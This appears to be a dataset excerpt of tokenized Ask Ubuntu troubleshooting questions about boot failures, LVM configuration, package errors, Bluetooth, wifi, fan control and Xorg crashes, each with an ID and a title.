; print ( $ data ) ; -bash : syntax error near unexpected token ` ( ' vagrant @ precise64 : /home $ so i do n't know what to do and anything i do from here forward is just guessing . suggestions , please ? thanx .
493424	sed fix for busybox - boot fail unable to mount lvm	busybox why u no vi ? ! summary : ubuntu 14.04 server after upgrade first boot , only boots to busybox v1.21.1 initramfs with `` gave up waiting for root device '' due to missing /dev/mapper/xxx-root as unable to find/mount lvm vg due to incorrect exclusion filter in lvm.conf scenario : only have the single kernel 3.11.0-17 ( yes , no fallback ! ) , both normal and recovery go to busybox only ssh access , or ip kvm ( system in remote colo in dc over 10,000 miles away ) no access to bootable media as ip kvm does not load virtual media default initramfs configuration ( attempt to use vi shows vi : not found ) lvm pv should be on something like /dev/sda5 ( assume this as have many systems with same config and that is what the others are set as ) detail : 100 % sure issue is incorrect lvm filter ( configuring openstack cinder loopback device for lvm poorly ) , consequently is not scanning for lvm vg . known working should be default in lvm.conf : filter = [ `` a/ . */ '' ] however this is commented out and instead have in lvm.conf : filter = [ `` a/sda1/ '' , `` a/sdb/ '' , `` r/ . */ '' ] if i can make the change in lvm.conf by searching for incorrect string and replacing line with correct string in lvm.conf then i believe lvm vg will boot correctly . attempted solution : initramfs has no editing ( vi , vim , nano , etc ) , only sed have tried testing sed regex , sadly this is incredibly difficult to crack for this regex noob . i have so far : sed -i '/filter = [ `` a/sda1/ '' , `` a/sdb/ '' , `` r/ . */ '' ] /c\filter = [ `` a/ . */ '' ] ' /etc/lvm/lvm.conf which makes no change to a test file . i have trouble comprehending the complexities of slashes contained within the sed search/replace string in conjunction with the sed command slash syntax , maybe someone can assist here ? if i can crack the sed command regex i 'm fairly sure the kernel should be able to boot into lvm . alternatively is there a force/manual mount i could use ( from grub edit or initramfs ) , despite the incorrect lvm.conf filter , what is this ? as a fallback , i could go down the path of maas ( ubuntu 's web based pxe/tftp image booting ) , which i have configured on another server in the dc , but have not yet tested , or used . i am happy to try to blast a new ubuntu 14.04 server onto the non-booting system using maas . correctly editing lvm.conf by cracking sed first in busybox is more desired . i 'd like to understand this for future , or any other suggestions ? edit at grub , manual lvm vg boot , or any other suggestions that help are appreciated . thank you .
493430	dropbear failed to restart	i have been got this when i use at-get dist-upgrade : : ahmad @ elvina-ta890gxe : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up dropbear ( 2011.54-1ubuntu0.12.04.2 ) ... restarting dropbear ssh server : invoke-rc.d : initscript dropbear , action `` restart '' failed . dpkg : error processing dropbear ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : dropbear e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ahmad @ elvina-ta890gxe : ~ $ sudo dpkg -- configure -d 777 dropbear d000040 : checking dependencies of dropbear ( - < none > ) d000400 : checking group ... d000400 : checking possibility - > libc6 d000400 : is installed , ok and found d000400 : found 3 d000400 : found 3 matched 0 possfixbytrig - d000400 : checking group ... d000400 : checking possibility - > zlib1g d000400 : is installed , ok and found d000400 : found 3 d000400 : found 3 matched 0 possfixbytrig - d000040 : ok 2 msgs > > < < d000040 : checking breaks d000400 : checking virtbroken ssh-server setting up dropbear ( 2011.54-1ubuntu0.12.04.2 ) ... d000002 : fork/exec /var/lib/dpkg/info/dropbear.postinst ( configure 2011.54-1ubuntu0.12.04.1 ) restarting dropbear ssh server : invoke-rc.d : initscript dropbear , action `` restart '' failed . dpkg : error processing dropbear ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : dropbear ahmad @ elvina-ta890gxe : ~ $ how should i do to get out out this error . thanks . ( note : : i need someone add dropbear tag since i still unable to do it . )
493431	hangs on or after fsck from util-linux 2.20.1	i have a box running at digitalocean with ubuntu 12.04 it 's rare that my system will boot or takes forever - normally it just hangs / chokes . a reboot from a remote shell used to be pretty quick and i could reconnect within 10 seconds or so . here 's screens shots of where it gets to : hang image compilation i have been told that such may happen after a kernel upgrade if their `` hypervisor '' does n't have that kernel and that it may require manual setting from do 's support . i had them mount their archlinux recovery disk and checked out the system 's /lib/modules : i 've been told these are the supported kernels that ubuntu can run with . directory /lib/modules i set my kernel to : ubuntu 12.04 x64 vmlinux-3.8.0-42-generic from do 's droplet settings . i 'm still getting the above hangs and some of the images above were after such .
493432	will ubuntu supports switchable graphics ?	does ubuntu supports switchable graphics ? i am using hp pavilion dv6 laptop . i tried ubuntu 12.04 but my laptop is becoming too hot .
493433	can not find device path for usb bluetooth adapter	i am trying to use a bluetooth adapter ( known as broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) in lsusb , see further below ) under xubuntu 14.04 , but my system never recognizes it . i read that using hid2hci could help , but for that , i need to find the exact device path ( which should be found somewhere within /sys/ apparently ) . how do i find that device 's path ? lsusb output : bus 001 device 004 : id 058f:6362 alcor micro corp . flash card reader/writer bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 004 : id 0a5c:4503 broadcom corp . mouse ( boot interface subclass ) bus 004 device 003 : id 0a5c:4502 broadcom corp . keyboard ( boot interface subclass ) bus 004 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c51b logitech , inc. v220 cordless optical mouse for notebooks bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub lspci output : 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 03:00.0 ethernet controller : qualcomm atheros ar8131 gigabit ethernet ( rev c0 ) 05:00.0 ethernet controller : qualcomm atheros ar5212/ar5213 wireless network adapter ( rev 01 ) lsmod output : fred @ fred-xubuntu : ~ $ lsmod | grep bt btusb 32412 0 bluetooth 395423 11 bnep , btusb , rfcomm fred @ fred-xubuntu : ~ $ lsmod | grep bluetooth bluetooth 395423 11 bnep , btusb , rfcomm some attempts at using hid2hci : fred @ fred-xubuntu : ~ $ /lib/udev/hid2hci -- method=logitech-hid -- devpath=/devices/pci0000:00/0000:00:1d.2/usb4/4-2/4-2.1/4-2.1:1.0 error : could not find hiddev device node fred @ fred-xubuntu : ~ $ /lib/udev/hid2hci -- method=logitech-hid -- devpath=/devices/pci0000:00/0000:00:1d.2/usb4/4-2/4-2.2/4-2.2:1.0 error : could not find hiddev device node by the way , i 've read there 's a way to make bluetooth adapters work by doing some tweaking on windows , but i 'd prefer to know if there 's a way to rely only on linux to do this .
493436	12.04 to 14.04 upgraded signin problems	i just upgraded from ubuntu 12.04 lts to 14.04 32bit desktop via the terminal command . sudo do-release-upgrade -d. after completion i rebooted and tried to login but as soon as i enter the password the page shows lots of text and goes back to the signin page . i thought i was my password so i tried a different password but got the wrong password message . so i know the original password is still accepted but it wo n't go beyond the signin page . i tried the fix disc option from the boot menu but it just got stuck and did nothing . how can i fix this problem . i am not very much used to the command system as i moved over from windows . but i can follow instructions well . thanks since this post i have tried to change the root user but no use , -- reinstall ubuntu desktop and unity but still not working . when i use the the sudo apt-get install -- reinstall ubuntu-desktop command i get a long list saying that there are unmet dependencies . two lists are there 1 kde-runtime and 2 ubuntu-desktop kde-runtime : depends : libexiv2-12 but it is not going to be installed : libkactivities6 ( > =4.7.90 ) but it is not going to be installed : libkdeclarative5 ( > =4:4.9.60 ) but 4:4.8.5-0ubuntu0.3 is to be installed : libkio5 ( > = 4:4.11.80 ) but 4:4.8.5-0ubuntu0.3 is to be installed : libkubuntu0 ( > =14.04ubuntu1 ) but it is not going to be installed : libkxmlrpcclient4 ( > =4:4.13.2 ) but it is not going to be installed : libssh-4 ( > =0.6.1 ) but 0.5.2-1ubuntu0.12.04.3 is to be installed : kdelibs5-plugins ( > =4:4.13.2 ) but 4:4.8.5-0ubuntu0.3 to be installed : plasma-scriptengine-javascript ( =4:4.13.2-0ubuntu0.1 ) but 4:4.8.5-0ubuntu0.2 is to be installed : libqap12-runtime but it is not going to be installed ubuntu-desktop : depends : checkbox-gui but it is not going to be installed : gnome-calculator : gstreamer1.0.-alsa but it is not going to be installed : gstreamer1.0-plugins-base-apps but it is not going to be installed : ubuntu-session but it is not going to be installed : ubuntu-settings but it is not going to be installed : ubuntu-sso-client-qt but it is not going to be installed : unity-control-center but it is not going to be installed and there is a long list of recommends with both these above items ( i.e kde-runtime and unity-desktop ) in the end it says e : unmet dependencies . try apt-get -f install with no packages ( or specify a solution ) . i have all my files on this computer and need this resolved quickly . plz plz help
493437	unable to build a project using make all	i am trying to build a mn-fit project on my ubuntu 12.04 lts ( x_64 ) machine . when i am compiling using make all , getting the following error : /bin/sh : 1 : /cern/2002/bin/cernlib : not found /usr/bin/ld : can not find -lgcc_s collect2 : ld returned 1 exit status frankly speaking , i am little naive on these building things with libs etc ... pleases help me as urgent ... thank you for you attention and anticipation regards rajeev
493439	can not run ubuntu 14.04.x or any distro based on ubuntu 14.04.x	i am currently running ubuntu 12.04.4 lts ( supported until 2017 ) . when i try to either `` try '' without installing or try to install ubuntu 14.04.x or any of the distros that are based on ubuntu 14.04 , my computer slows to a crawl ; virtually locks up . it is impossible to do anything . here the results of the lshw under ubuntu 12.04.4. root @ met-desktop : /home/met # lshw met-desktop description : desktop computer product : to be filled by o.e.m . ( to be filled by o.e.m . ) vendor : to be filled by o.e.m . version : to be filled by o.e.m . serial : to be filled by o.e.m . width : 64 bits capabilities : ldt16 vsyscall32 configuration : boot=normal chassis=desktop family=to be filled by o.e.m . sku=to be filled by o.e.m . uuid=00020003-0004-0005-0006-000700080009 *-core description : motherboard product : emx-mcp61d3-icafe vendor : emaxx technologies , inc physical id : 0 version : v2.0 *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : 080015 date : 01/20/2011 size : 64kib capacity : 960kib capabilities : isa pci pnp apm upgrade shadowing escd cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer int10video acpi usb ls120boot zipboot biosbootspecification *-cpu description : cpu product : amd sempron ( tm ) 145 processor vendor : hynix semiconductor ( hyundai electronics ) physical id : 3 bus info : cpu @ 0 version : amd sempron ( tm ) 145 processor serial : to be filled by o.e.m . slot : cpu 1 size : 2800mhz capacity : 2800mhz width : 64 bits clock : 200mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt hw_pstate npt lbrv svm_lock nrip_save cpufreq configuration : cores=1 enabledcores=1 *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 128kib capacity : 128kib capabilities : pipeline-burst internal varies *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 1mib capacity : 1mib capabilities : pipeline-burst internal varies *-memory:0 description : system memory physical id : 24 slot : system board or motherboard size : 4gib *-bank:0 description : dimm synchronous 533 mhz ( 1.9 ns ) product : 9905474-012.a00lf vendor : kingston physical id : 0 serial : 80662811 slot : dimm0 size : 2gib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:1 description : dimm synchronous 533 mhz ( 1.9 ns ) product : 9905474-052.a00lf vendor : kingston physical id : 1 serial : bc38162d slot : dimm1 size : 2gib width : 64 bits clock : 533mhz ( 1.9ns ) *-bank:2 description : [ empty ] product : modulepartnumber02 vendor : manufacturer02 physical id : 2 serial : sernum02 slot : dimm2 *-bank:3 description : [ empty ] product : modulepartnumber03 vendor : manufacturer03 physical id : 3 serial : sernum03 slot : dimm3 *-memory:1 unclaimed description : ram memory product : mcp61 memory controller vendor : nvidia corporation physical id : 4 bus info : pci @ 0000:00:00.0 version : a1 width : 32 bits clock : 66mhz ( 15.2ns ) capabilities : ht bus_master cap_list configuration : latency=0 *-isa description : isa bridge product : mcp61 lpc bridge vendor : nvidia corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : a2 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 resources : ioport:4f00 ( size=256 ) *-serial description : smbus product : mcp61 smbus vendor : nvidia corporation physical id : 1.1 bus info : pci @ 0000:00:01.1 version : a2 width : 32 bits clock : 66mhz capabilities : pm cap_list configuration : driver=nforce2_smbus latency=0 resources : irq:10 ioport:4900 ( size=64 ) ioport:4d00 ( size=64 ) ioport:4e00 ( size=64 ) *-memory:2 unclaimed description : ram memory product : mcp61 memory controller vendor : nvidia corporation physical id : 1.2 bus info : pci @ 0000:00:01.2 version : a2 width : 32 bits clock : 66mhz ( 15.2ns ) configuration : latency=0 *-processor unclaimed description : co-processor product : mcp61 smu vendor : nvidia corporation physical id : 1.3 bus info : pci @ 0000:00:01.3 version : a2 width : 32 bits clock : 66mhz capabilities : bus_master configuration : latency=0 maxlatency=1 mingnt=3 resources : memory : d0000000-d007ffff *-usb:0 description : usb controller product : mcp61 usb 1.1 controller vendor : nvidia corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : a3 width : 32 bits clock : 66mhz capabilities : pm ohci bus_master cap_list configuration : driver=ohci-pci latency=0 maxlatency=1 mingnt=3 resources : irq:23 memory : dfffb000-dfffbfff *-usb:1 description : usb controller product : mcp61 usb 2.0 controller vendor : nvidia corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : a3 width : 32 bits clock : 66mhz capabilities : debug pm ehci bus_master cap_list configuration : driver=ehci-pci latency=0 maxlatency=1 mingnt=3 resources : irq:22 memory : dfffac00-dfffacff *-pci:0 description : pci bridge product : mcp61 pci bridge vendor : nvidia corporation physical id : 100 bus info : pci @ 0000:00:04.0 version : a1 width : 32 bits clock : 66mhz capabilities : pci ht subtractive_decode bus_master cap_list *-multimedia description : audio device product : mcp61 high definition audio vendor : nvidia corporation physical id : 5 bus info : pci @ 0000:00:05.0 version : a2 width : 32 bits clock : 66mhz capabilities : pm msi ht bus_master cap_list configuration : driver=snd_hda_intel latency=0 maxlatency=5 mingnt=2 resources : irq:23 memory : dfff4000-dfff7fff *-ide:0 description : ide interface product : mcp61 ide vendor : nvidia corporation physical id : 6 bus info : pci @ 0000:00:06.0 version : a2 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list configuration : driver=pata_amd latency=0 maxlatency=1 mingnt=3 resources : irq:0 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : ffa0 ( size=16 ) *-ide:1 description : ide interface product : mcp61 sata controller vendor : nvidia corporation physical id : 8 bus info : pci @ 0000:00:08.0 version : a2 width : 32 bits clock : 66mhz capabilities : ide pm msi ht bus_master cap_list configuration : driver=sata_nv latency=0 maxlatency=1 mingnt=3 resources : irq:21 ioport : d080 ( size=8 ) ioport : d000 ( size=4 ) ioport : cc00 ( size=8 ) ioport : c880 ( size=4 ) ioport : c800 ( size=16 ) memory : dfff9000-dfff9fff *-ide:2 description : ide interface product : mcp61 sata controller vendor : nvidia corporation physical id : 8.1 bus info : pci @ 0000:00:08.1 version : a2 width : 32 bits clock : 66mhz capabilities : ide pm msi ht bus_master cap_list configuration : driver=sata_nv latency=0 maxlatency=1 mingnt=3 resources : irq:20 ioport : c480 ( size=8 ) ioport : c400 ( size=4 ) ioport : c080 ( size=8 ) ioport : c000 ( size=4 ) ioport : bc00 ( size=16 ) memory : dfff8000-dfff8fff *-pci:1 description : pci bridge product : mcp61 pci express bridge vendor : nvidia corporation physical id : 9 bus info : pci @ 0000:00:09.0 version : a2 width : 32 bits clock : 33mhz capabilities : pci pm msi ht pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 *-pci:2 description : pci bridge product : mcp61 pci express bridge vendor : nvidia corporation physical id : b bus info : pci @ 0000:00:0b.0 version : a2 width : 32 bits clock : 33mhz capabilities : pci pm msi ht pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 *-pci:3 description : pci bridge product : mcp61 pci express bridge vendor : nvidia corporation physical id : c bus info : pci @ 0000:00:0c.0 version : a2 width : 32 bits clock : 33mhz capabilities : pci pm msi ht pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : e000 ( size=4096 ) ioport : dcf00000 ( size=1048576 ) *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 03 serial : 00 : e0:66:9a:69:8e size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=10.20.66.8 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : e800 ( size=256 ) memory : dcfff000-dcffffff memory : dcff8000-dcffbfff *-display description : vga compatible controller product : c61 [ geforce 7025 / nforce 630a ] vendor : nvidia corporation physical id : d bus info : pci @ 0000:00:0d.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:22 memory : de000000-deffffff memory : c0000000-cfffffff memory : dd000000-ddffffff memory : dffc0000-dffdffff *-pci:4 description : host bridge product : family 10h processor hypertransport configuration vendor : hynix semiconductor ( hyundai electronics ) physical id : 101 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:5 description : host bridge product : family 10h processor address map vendor : hynix semiconductor ( hyundai electronics ) physical id : 102 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : family 10h processor dram controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 103 bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz *-pci:7 description : host bridge product : family 10h processor miscellaneous control vendor : hynix semiconductor ( hyundai electronics ) physical id : 104 bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k10temp resources : irq:0 *-pci:8 description : host bridge product : family 10h processor link control vendor : hynix semiconductor ( hyundai electronics ) physical id : 105 bus info : pci @ 0000:00:18.4 version : 00 width : 32 bits clock : 33mhz *-scsi:0 physical id : 7 logical name : scsi0 capabilities : emulated *-disk description : ata disk product : st3250318as vendor : seagate physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : cc38 serial : 9vy96fn6 size : 232gib ( 250gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00062c09 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : aac7d53e-9e30-45e9-9674-3ec261624666 size : 229gib capacity : 229gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2014-06-19 12:24:25 filesystem=ext4 lastmountpoint=/ modified=2014-06-19 12:35:08 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-07-09 11:04:01 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 3838mib capacity : 3838mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 3838mib capabilities : nofs *-scsi:1 physical id : a logical name : scsi1 capabilities : emulated *-cdrom description : dvd-ram writer product : cddvdw sh-s223c vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : sb04 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc can anyone tell me if my current computer and it 's configuration is compatible to run 14.04.x ? i strongly suspect that either the motherboard , the processor , or the onboard video , or a combination of the three , is the problem .
493440	unetbootin wont boot win 7	i made a boot-able windows 7 usb via unetbbootin and when i go to boot up , it gets stuck at the unetbootin boot menu and it cant find `` default '' so it just keeps repeating the `` will boot automatically in 10 seconds '' countdown . i 've tried redoing the unetbootin extract but still the same issue . i 'm a newbie so as much detail as possible would be great .
493441	massive download speed reduction after fresh 14.04 install on dual boot mac	after a weekend of pouring through how-to 's , i have successfully installed and booted ubuntu 14.04 lts ( x64 ) along side mac os x mountain lion , on my macbook pro . it was a small victory . for the most-part , it 's smooth-sailing . however , i have noticed a drastic decrease in my wifi speeds both while booted in ubuntu and on os x . compare 0.4mbps to 24mbps download speed on a windows machine on the same network . does anyone have any advice on how to remedy this ? a few details on my install procedure : mac disk utility to partition my ssd refind boot manager install from dvd burnt by following ubuntu 's how to burn a dvd on os x edit : i did read this thread about slow wireless connections on 14.04 ; however the accepted answer here is a kernal upgrade . as my problem is occurring on both the os x side and the ubuntu side , i do n't see these issues having a common cause edit2 : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1a.7 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb universal host controller ( rev 06 ) 00:1d.7 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 330m ] ( rev a2 ) 01:00.1 audio device : nvidia corporation gt216 hdmi audio controller ( rev a1 ) 02:00.0 ethernet controller : broadcom corporation netxtreme bcm5764m gigabit ethernet pcie ( rev 10 ) 03:00.0 network controller : broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) 04:00.0 firewire ( ieee 1394 ) : lsi corporation fw643 [ truefire ] pcie 1394b controller ( rev 08 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) thanks if you can point me in the right direction , or have found a solution for this
493442	how to setup openvpn server on a namespace ?	i have used openvpn for setting up vpn connections , but i have always set it up on the default root namespace . now , i want to set it up only on a particular namespace other than the default root namespace . is it possible to do so ? can someone guide me if possible ? thank you
493444	pwmconfig not writing to /etc/fancontrol	so i decided to switch from win8 to ubuntu for dev ( all the team uses.. ) , and so i have the it-seems-classic problem of 'fan was quiet under win and blasts with ubuntu' i 've tried everything - loaded all the apps - read all the info i could find . and i still ca n't get it to be quiet . i have identified the gpu to be the problematic fan , since i could successfully shut down the cpu fan while testing with pwmconfig ( although it wo n't write a conf file after ) . so i run this pwmconfig , and i even login as root to try and create a config file manually in /etc/fancontrol but without success . the log below show too blasting fans but it 's actually only one - the other one has been triggered up by pwmconfig ... any idea how i could solve this ? sensors works pwmconfig works - at least as a diagnosis fancontrol would work if i could write a proper config file i guess . *-display description : vga compatible controller product : turks xt [ radeon hd 6670/7670 ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:47 memory : c0000000-cfffffff memory : fe620000-fe63ffff ioport : e000 ( size=256 ) memory : fe600000-fe61ffff root @ pegasus-dx4860 : ~ # sensors radeon-pci-0100 adapter : pci adapter temp1 : +87.5°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +30.0°c ( high = +80.0°c , crit = +98.0°c ) core 0 : +24.0°c ( high = +80.0°c , crit = +98.0°c ) core 1 : +30.0°c ( high = +80.0°c , crit = +98.0°c ) core 2 : +29.0°c ( high = +80.0°c , crit = +98.0°c ) core 3 : +28.0°c ( high = +80.0°c , crit = +98.0°c ) it8772-isa-0a30 adapter : isa adapter in0 : +0.94 v ( min = +0.82 v , max = +0.04 v ) alarm in1 : +2.22 v ( min = +2.74 v , max = +3.00 v ) alarm in2 : +2.88 v ( min = +1.60 v , max = +0.84 v ) alarm in3 : +2.98 v ( min = +2.29 v , max = +0.82 v ) alarm in4 : +2.93 v ( min = +0.08 v , max = +1.27 v ) alarm in5 : +2.22 v ( min = +0.80 v , max = +0.77 v ) alarm in6 : +2.22 v ( min = +2.40 v , max = +2.03 v ) alarm 3vsb : +3.36 v ( min = +3.29 v , max = +1.44 v ) alarm vbat : +3.36 v fan1 : 0 rpm ( min = 10 rpm ) alarm fan2 : 2566 rpm ( min = 405 rpm ) fan3 : 4115 rpm ( min = 13 rpm ) temp1 : +30.0°c ( low = +66.0°c , high = +97.0°c ) sensor = thermal diode temp2 : +30.0°c ( low = +68.0°c , high = -47.0°c ) alarm sensor = thermal diode temp3 : +29.0°c ( low = -30.0°c , high = +50.0°c ) sensor = intel peci intrusion0 : alarm
493447	hardware compatibility \i386\winnt32 /checkupgradeonly	is there any command like \i386\winnt32 /check upgradeonly in ubuntu ?
493448	' ? ' symbol is appearing while opening a desktop icon	gnome-desktop-item-edit ~/desktop/ -- create-new i created new desktop icon in ubuntu 13.04 using above command . i 'm able to create the desktop icon but while opening that application in launcher a ' ? ' symbol appears ( i.e the application is opening despite the ' ? ' symbol ) .
493449	chrome youtube videos logging me out	pretty much a ubuntu novice , currently running 64-bit amd ubuntu 12.04 with cinnamon 2.0.14 over the past couple months i 've been getting logged out while viewing videos , typically youtube . seems pretty random but repeatable within 2-3 minutes . all i have to do is change the volume , resize the window , or select different points for the video . this seems to only happen in chrome . i 've not noticed this with firefox or konqueror , though i use them a lot less , so it might happen in those as well . i 've removed/reinstalled chrome , but same issue remains . i looked in the following two files right after i got logged out/in - /var/log/kern.log and /var/log/xorg.0.log.old and see something questionable to me : in /var/log/kern.log : jul 8 21:44:34 steve-ideapad-z570 kernel : [ 1983.775557 ] xorg [ 4188 ] general protection ip:7fda8d636420 sp:7fff2c5623d0 error:0 in xorg [ 7fda8d5f0000+1f0000 ] in /var/log/xorg.0.log.old : [ 1985.718 ] segmentation fault at address ( nil ) [ 1985.718 ] caught signal 11 ( segmentation fault ) . server aborting [ 1985.718 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 1985.718 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 1985.718 ] not sure where or what else to look for . can anyone point me to the best way to troubleshoot this ? **wondered if it might be memory related so i ran memtest86+ but it did n't find anything failing . so , how is the best way to troubleshoot this problem ?
